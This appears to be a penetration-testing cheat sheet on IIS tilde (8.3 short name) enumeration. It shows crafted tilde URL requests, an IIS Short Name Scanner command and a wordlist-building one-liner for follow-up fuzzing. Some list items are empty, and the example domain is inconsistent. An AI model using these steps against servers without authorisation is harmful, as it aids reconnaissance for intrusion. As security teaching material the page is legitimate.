iis-tilde-enumeration
IIS Tilde Enumeration
IIS Tilde Enumeration (also known as IIS Short Name Disclosure or 8.3 Name Disclosure) is a vulnerability in Microsoft Internet Information Services (IIS) where attackers can enumerate files and directories using their short (8.3) names. Windows supports legacy 8.3 filenames (e.g., longfilename.txt → LONGFI~1.TXT), and IIS may expose these names due to improper handling of tilde (~) characters in URL requests. This allows attackers to infer the presence of files and folders, even if directory listing is disabled. By sending crafted HTTP requests with ~1, ~2, etc., attackers can systematically determine file and folder names, leading to potential information disclosure and aiding further exploitation. This issue affects IIS versions up to IIS 8.5 unless mitigated by disabling 8.3 filename support or applying security patches.
Enumeration
- Nmap to find which port runs IIS.
- Bruteforce Manually
<strong>## Example: 'Chocolate' directory exists.
</strong>
http://rezydev.xyz/~a ## invalid
http://rezydev.xyz/~b ## invalid
http://rezydev.xyz/~c ## 200 OK, so a directory with 1st letter c exists.
http://rezydev.xyz/~ca ## invalid
http://rezydev.xyz/~cb ## invalid
http://rezydev.xyz/~cc ## invalid
//..SNIP..//
http://rezydev.xyz/~ch ## 200 OK, so a directory with 2nd letter h exists.
<strong>## Once we find shortname
</strong>http://rezydev.com/choco~1.txt
file~1.txt ⇒ file.txt
file~2.txt ⇒ file1.txt
- Automated Tool (IIS Short Name Scanner)
java -jar iis_shortname_scanner.jar 0 20 http://rezydev.xyz/
Other Notable Automated Tools:
After Finding Shortnames
We won't be able to access the files/pages with shortnames like http://rezydev.xyz/choco~1.asp because GET Request won't support it. We can generate a wordlist since we have hint for the filename's first few letters.
egrep -r ^file /usr/share/wordlist/* | sed 's/^[^:]*://' > iisenum_list.txt
Then Fuzz using any tool of choice: